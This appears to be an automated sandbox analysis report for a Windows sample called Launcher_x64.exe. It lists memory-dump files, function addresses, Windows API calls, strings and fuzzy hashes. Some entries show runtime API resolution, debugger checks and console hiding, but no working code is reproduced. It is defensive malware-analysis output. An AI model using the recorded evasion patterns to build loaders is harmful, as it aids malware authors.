Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
Instruction ID: b1b73bbb8a89f5abeca551d8b4f9a146d04717acd18eae032022585d67f9b0e0
Opcode Fuzzy Hash: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
Instruction Fuzzy Hash: 2531B032501218EBCF379F58C8459AA7B66FF09315B19C65AFC9C4A121E332CCA1DBB1

Analysis Process: Launcher_x64.exePID: 7364, Parent PID: 7312COMMON

Non-executed Functions

Function 00D7B1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B250
GetLocaleInfoW.KERNEL32(?,20001004,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B279
GetACP.KERNEL32(?,?,00D7AB6D,?,00000000), ref: 00D7B28E

Strings

OCP, xrefs: 00D7B20B
ACP, xrefs: 00D7B1D5

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
Instruction ID: ad49d30e01a4e4d86c5439c32d2d6f1389a12d6cb51c74148564451106975f2d
Opcode Fuzzy Hash: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
Instruction Fuzzy Hash: 1021C422A02100AADB348F54C805B9F73A7AF54B34B5AC026E80EDB216F732DD40C778

Function 00D7AA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D7AB3F
IsValidCodePage.KERNEL32(00000000), ref: 00D7AB7D
IsValidLocale.KERNEL32(?,00000001), ref: 00D7AB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D7ABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D7ABF3

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
Instruction ID: e06a8d4d02587f620353ddd69fedfa8a7e3d78e66bc80585e358d1a7ec63fff4
Opcode Fuzzy Hash: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
Instruction Fuzzy Hash: 3A5171B1A00219AFDB11DFA8CC45ABE73B9EF84700F088569E908E7191F770D944CB72

Function 00D73440 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: e11eecbea5574055480e474f930a62a5d8ea565e96ba689ed594bd4078c99adf
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: EC022EB1E012199BDF14CFA9C8806AEFBF1FF48314F148269E519E7341E731AA45DBA0

Function 00D7B799 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7B889

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 549cea7732a3910a054da503e428a285a943a59f242e259efbcf39884d14e04e
Instruction ID: 2d3d9e401ec0b220937be106588e4fa27c6fbc05bbfd1855c9caed4842c165b3
Opcode Fuzzy Hash: 549cea7732a3910a054da503e428a285a943a59f242e259efbcf39884d14e04e
Instruction Fuzzy Hash: B071B371905158AFDF20AF289C89BAEB7B8EF45310F5881DAE54DA7211FB314E849F70

Function 00D69A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D69A7F
IsDebuggerPresent.KERNEL32 ref: 00D69B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D69B64
UnhandledExceptionFilter.KERNEL32(?), ref: 00D69B6E

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
Instruction ID: 7fdec92870f0d2781a78abc8879858e6f38e773c036cc1ab135d9c4411f21d82
Opcode Fuzzy Hash: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
Instruction Fuzzy Hash: 9A31D775D053199BDB21EFA4D949BCDBBF8AF48300F1041EAE40DAB250EB719A848F55

Function 00D61C10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00D61C3B
GetFileSize.KERNEL32 ref: 00D61CC3
CloseHandle.KERNEL32 ref: 00D61CDF

Strings

CreateFileA, xrefs: 00D61C2E

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressCloseFileHandleProcSize
String ID: CreateFileA
API String ID: 2836222988-1429953656
Opcode ID: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
Instruction ID: 91d4f7fd6afe5d3ee9a9cae4db60e339a0621f2ccba58caf3f873401b70d58e1
Opcode Fuzzy Hash: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
Instruction Fuzzy Hash: 844194B4D083099FDB00EFA8D4586AEBBF0EF49314F048529E899A7350D7789545CFA2

Function 00D841D2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00D841BD,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00D84278
__alloca_probe_16.LIBCMT ref: 00D84333
__alloca_probe_16.LIBCMT ref: 00D843C2
__freea.LIBCMT ref: 00D8440D
__freea.LIBCMT ref: 00D84413
__freea.LIBCMT ref: 00D84449
__freea.LIBCMT ref: 00D8444F
__freea.LIBCMT ref: 00D8445F

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
Instruction ID: 49a35b566737594274ff105722d898b4ce4c5f8dac78fe18e3ada44ba398b050
Opcode Fuzzy Hash: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
Instruction Fuzzy Hash: A371E27290424BABDF20BF98CC52BAE7BB9EF45314F294059F914B7281E6B5DC0087B4

Function 00D785B6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D7863C

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 934878f86550f09cd9263c6ed98f554efb05fbd23718919bf43427b62466e413
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: BAB15972E40355AFDB158F28CC85BAEBBA5EF55310F288155E809AF282FA70D901D7B1

Function 00D6ABB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D6ABE7
___except_validate_context_record.LIBVCRUNTIME ref: 00D6ABEF
_ValidateLocalCookies.LIBCMT ref: 00D6AC78
__IsNonwritableInCurrentImage.LIBCMT ref: 00D6ACA3
_ValidateLocalCookies.LIBCMT ref: 00D6ACF8

Strings

csm, xrefs: 00D6AC8D

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
Instruction ID: 3b3b2a0a53eeed51e44078616cf7293e44cf32aa857e983f8c8a60b6df6d6164
Opcode Fuzzy Hash: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
Instruction Fuzzy Hash: 1041B238A002189BCF10EF6CD885A9E7BA1EF45324F198155E859AB352D771EA01CFB2

Function 00D76642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00D76751,00000000,00000000,00000000,00000000), ref: 00D76703

Strings

ext-ms-, xrefs: 00D766AD
api-ms-, xrefs: 00D76699

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
Instruction ID: 8fea9fe6ccce4fed1752232999deaddf95b6b9aee658ad4e0435180fc54c4167
Opcode Fuzzy Hash: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
Instruction Fuzzy Hash: 26210276A01B25ABC732AB24DC44A5E3368EB417A0F694165FD09E7290FB70ED00DBF0

Function 00D82E9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fbe3d61d9c76832891ff93ecd83829f43f9c31fadd32656efcf6489f2fb2ff0
Instruction ID: 611d60a1b236edbc5d0d9e650fde31abdce939d2bd48a4ca5f400ba2e4f4b500
Opcode Fuzzy Hash: 6fbe3d61d9c76832891ff93ecd83829f43f9c31fadd32656efcf6489f2fb2ff0
Instruction Fuzzy Hash: FCB10370A04349AFEB11EFA9C881BBEBBB5FF45B10F184258E51997392D7709A41CB70

Function 00D7446D Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D74464,00D6A97D,00D69BD4), ref: 00D7447B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D74489
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D744A2
SetLastError.KERNEL32(00000000,00D74464,00D6A97D,00D69BD4), ref: 00D744F4

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
Instruction ID: 27668c365a16668fd51b1610f9fa088bc9c2a33a7cfb00d193f4ff9394e57a4f
Opcode Fuzzy Hash: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
Instruction Fuzzy Hash: F101883210A3116EF7262779BC85A6B2B94EB41778B28833AF518951F5FF914C01A670

Function 00D74D4C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D74E6B
CallUnexpected.LIBVCRUNTIME ref: 00D750E4

Strings

csm, xrefs: 00D74EA2
csm, xrefs: 00D74D89
csm, xrefs: 00D74DF6

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
Instruction ID: 07c35343a6df0caaca8df01867173df263c8bc8a7e0d0462df5e49a4ef2817ee
Opcode Fuzzy Hash: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
Instruction Fuzzy Hash: FCB17C31800219EFCF16DF94D8419AEB7B5FF04310B18855AF9186B216E7B1DA61CFB2

Function 00D6F1F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F22D
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F261

Strings

mscoree.dll, xrefs: 00D6F226
CorExitProcess, xrefs: 00D6F237

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
Instruction ID: 450ec39a652cd495261d9672dc95dbe26bc31b3cbf07e6615cf0ff5d58ce8e43
Opcode Fuzzy Hash: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
Instruction Fuzzy Hash: 12018F35964669EFDB019B50EC0ABAEBBB8FB44B15F040625E811E23D0DB749904CFA0

Function 00D76E2A Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00D76EAF
__alloca_probe_16.LIBCMT ref: 00D76F78
__freea.LIBCMT ref: 00D76FDF

Part of subcall function 00D756F1: HeapAlloc.KERNEL32(00000000,00D77675,?,?,00D77675,00000220,?,?,?), ref: 00D75723

__freea.LIBCMT ref: 00D76FF2
__freea.LIBCMT ref: 00D76FFF

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
Instruction ID: cde01a86448bb64052969109a29847d4c287507c2000c9e06a044bb4961f635d
Opcode Fuzzy Hash: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
Instruction Fuzzy Hash: 2051C172600A56AFEB219F64EC81EFBBAA9EF44754B198439FD0CD6150FB71DC1086B0

Function 00D677F2 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D677F9
std::_Lockit::_Lockit.LIBCPMT ref: 00D67804
std::_Lockit::~_Lockit.LIBCPMT ref: 00D67872

Part of subcall function 00D676EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D67707

std::locale::_Setgloballocale.LIBCPMT ref: 00D6781F
_Yarn.LIBCPMT ref: 00D67835

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
Instruction ID: ff328a141bef2c07463cd1d96ba741a74c40fe001eb9a12c0d9c46b7d841cd57
Opcode Fuzzy Hash: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
Instruction Fuzzy Hash: AC01BC79A046159BCB06EF20D84A97C7B76FF90354B09004AE80297381DF34AE02CFB1

Function 00D620C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00D620E6
GetProcAddress.KERNEL32 ref: 00D620FE

Strings

kernel32.dll, xrefs: 00D620DD
FreeConsole, xrefs: 00D620F1

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1646373207-2564406000
Opcode ID: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
Instruction ID: baff1fb42717a0f2906c4aba6ad6156d9f4b886ec8448bace1d34544f7acb431
Opcode Fuzzy Hash: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
Instruction Fuzzy Hash: 5B016670E14208AFCB40EFB8D94569DBBF4EB48300F41856AE849D7351EB34A6548FA2

Function 00D7F6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

